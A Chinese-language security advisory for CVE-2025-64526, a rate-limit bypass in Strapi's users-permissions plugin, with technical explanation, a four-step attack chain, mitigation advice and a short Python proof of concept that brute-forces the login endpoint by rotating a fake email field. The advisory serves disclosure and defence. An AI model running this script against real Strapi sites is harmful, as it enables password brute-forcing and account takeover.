CVE-2025-64526 CVSS 5.3 中危

CVE-2025-64526 Strapi速率限制绕过漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-64526

漏洞类型

速率限制绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Strapi

漏洞概述

Strapi在5.45.0版本之前的users-permissions插件中存在速率限制绕过漏洞。由于中间件使用ctx.request.body.email生成限流密钥，攻击者可在不需要该字段的路由中注入任意email值，从而绕过基于IP的访问限制，进行暴力破解攻击。

技术细节

该漏洞源于速率限制中间件的不当实现。中间件将密钥定义为${userIdentifier}:${requestPath}:${ctx.request.ip}，其中userIdentifier直接取自请求体中的email字段。在/auth/local或/auth/reset-password等路由中，email并非必填字段，但中间件仍将其纳入计算。攻击者通过在请求体中添加随机email参数，可不断更换限流密钥，导致IP限流失效，从而进行无限制的凭证猜测。

攻击链分析

STEP 1

侦察

识别目标Strapi系统及其认证接口（如/api/auth/local）。

STEP 2

漏洞利用

向认证接口发送POST请求，在请求体中注入非预期的'email'字段并使用随机值。

STEP 3

绕过限制

由于email值变化，服务端为每个请求生成新的限流Key，IP节流策略失效。

STEP 4

暴力攻击

利用绕过机制进行高频的密码暴力破解或重置码猜测，试图获取账户权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target endpoint (e.g., login)
target = "http://vulnerable-strapi.com/api/auth/local"

# Attack loop
for i in range(100):
    # Inject 'email' to rotate the rate-limit key, bypassing IP throttling
    payload = {
        "identifier": "admin",
        "password": "password123",
        "email": f"bypass_{i}@attacker.com" 
    }
    
    response = requests.post(target, json=payload)
    print(f"Attempt {i}: Status {response.status_code}")

影响范围

Strapi < 5.45.0

防御指南

临时缓解措施

建议在无法立即升级的情况下，在反向代理层面（如Nginx）配置严格的IP请求频率限制，以阻断高频暴力破解尝试。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表